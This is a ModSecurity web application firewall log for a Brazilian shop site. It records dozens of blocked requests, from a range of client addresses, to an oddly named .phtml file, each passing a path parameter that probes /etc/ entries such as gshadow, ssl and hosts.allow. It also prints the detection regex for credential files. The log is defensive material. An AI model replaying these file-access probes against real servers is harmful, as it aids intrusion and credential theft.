[Fri Mar 20 06:16:36.259571 2026] [:error] [pid 31215:tid 140411699963648] [client 57.141.18.116:57514] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QdAF0L0L-SsrnPo5TfwAAAsU"]
[Fri Mar 20 06:16:36.260700 2026] [:error] [pid 10189:tid 140411691570944] [client 57.141.18.27:57512] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QczJ3M9BSuKP7CAYDWAAAAIY"]
[Fri Mar 20 06:16:36.629099 2026] [:error] [pid 21219:tid 140411741927168] [client 57.141.18.95:57526] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QdPXLqtnMIWvjpaKGBgAAAoA"]
[Fri Mar 20 06:16:36.884621 2026] [:error] [pid 21219:tid 140411565680384] [client 57.141.18.104:57488] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QdPXLqtnMIWvjpaKGBwAAApU"]
[Fri Mar 20 06:16:37.228872 2026] [:error] [pid 10189:tid 140411548894976] [client 57.141.18.56:57542] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QdTJ3M9BSuKP7CAYDWQAAAJc"]
[Fri Mar 20 06:16:37.727810 2026] [:error] [pid 26799:tid 140411540502272] [client 57.141.18.9:57532] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qdda6ubjKNq_cu4a-LAAAA1g"]
[Fri Mar 20 06:16:37.871562 2026] [:error] [pid 21219:tid 140411557287680] [client 57.141.18.11:57560] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QdfXLqtnMIWvjpaKGCwAAApY"]
[Fri Mar 20 06:16:38.113612 2026] [:error] [pid 7893:tid 140411741927168] [client 57.141.18.10:57564] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QdhCii7xarUs8iHZT3wAAAgA"]
[Fri Mar 20 06:16:38.679035 2026] [:error] [pid 7893:tid 140411540502272] [client 57.141.18.23:57576] [client 57.141.18.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QdhCii7xarUs8iHZT4QAAAhg"]
[Fri Mar 20 06:16:39.027146 2026] [:error] [pid 11167:tid 140411574073088] [client 57.141.18.100:57588] [client 57.141.18.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qd_HIg5MgXLBnicPlhQAAAdQ"]
[Fri Mar 20 06:16:39.450493 2026] [:error] [pid 7893:tid 140411574073088] [client 57.141.18.50:57590] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QdxCii7xarUs8iHZT4gAAAhQ"]
[Fri Mar 20 06:16:39.487756 2026] [:error] [pid 21219:tid 140411632822016] [client 57.141.18.72:57592] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qd_XLqtnMIWvjpaKGDgAAAo0"]
[Fri Mar 20 06:16:40.285432 2026] [:error] [pid 11642:tid 140411708356352] [client 57.141.18.97:57612] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QeLninkcc-iUj5ApKFwAAA4Q"]
[Fri Mar 20 06:16:40.477481 2026] [:error] [pid 10189:tid 140411641214720] [client 57.141.18.123:57614] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QeDJ3M9BSuKP7CAYDWgAAAIw"]
[Fri Mar 20 06:16:40.830282 2026] [:error] [pid 9818:tid 140411632822016] [client 57.141.18.21:57620] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QeF1pVZ5mVmJwsFMbxwAAAE0"]
[Fri Mar 20 06:16:41.178795 2026] [:error] [pid 7893:tid 140411624429312] [client 57.141.18.55:57632] [client 57.141.18.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sasl2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QeRCii7xarUs8iHZT4wAAAg4"]
[Fri Mar 20 06:16:42.652542 2026] [:error] [pid 9818:tid 140411683178240] [client 57.141.18.89:57634] [client 57.141.18.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QeV1pVZ5mVmJwsFMbyAAAAEc"]
[Fri Mar 20 06:16:44.243047 2026] [:error] [pid 26799:tid 140411590858496] [client 57.141.18.17:57640] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qeta6ubjKNq_cu4a-LQAAA1I"]
[Fri Mar 20 06:16:44.243068 2026] [:error] [pid 11642:tid 140411616036608] [client 57.141.18.8:57638] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qebninkcc-iUj5ApKGAAAA48"]
[Fri Mar 20 06:16:45.707190 2026] [:error] [pid 9818:tid 140411708356352] [client 57.141.18.6:57642] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qel1pVZ5mVmJwsFMbyQAAAEQ"]
[Fri Mar 20 06:16:45.710414 2026] [:error] [pid 26799:tid 140411683178240] [client 57.141.18.120:57654] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/krb5.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qe9a6ubjKNq_cu4a-LgAAA0c"]
[Fri Mar 20 06:16:45.710454 2026] [:error] [pid 21219:tid 140411607643904] [client 57.141.18.81:57646] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QevXLqtnMIWvjpaKGEwAAApA"]
[Fri Mar 20 06:16:45.711645 2026] [:error] [pid 7235:tid 140411599251200] [client 57.141.18.114:57650] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qe_qxLDW4GITHUkTRQgAAARE"]
[Fri Mar 20 06:16:45.714260 2026] [:error] [pid 10189:tid 140411565680384] [client 57.141.18.86:57672] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QfDJ3M9BSuKP7CAYDXQAAAJU"]
[Fri Mar 20 06:16:45.715094 2026] [:error] [pid 15826:tid 140411548894976] [client 57.141.18.103:57648] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qe-oXxyEfFpUF8f9tggAAAVc"]
[Fri Mar 20 06:16:45.725128 2026] [:error] [pid 7235:tid 140411725141760] [client 57.141.18.24:57664] [client 57.141.18.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QfPqxLDW4GITHUkTRQwAAAQI"]
[Fri Mar 20 06:16:45.726773 2026] [:error] [pid 10189:tid 140411582465792] [client 57.141.18.124:57676] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QfTJ3M9BSuKP7CAYDXwAAAJM"]
[Fri Mar 20 06:16:45.728428 2026] [:error] [pid 10189:tid 140411683178240] [client 57.141.18.75:57678] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QfTJ3M9BSuKP7CAYDYAAAAIc"]
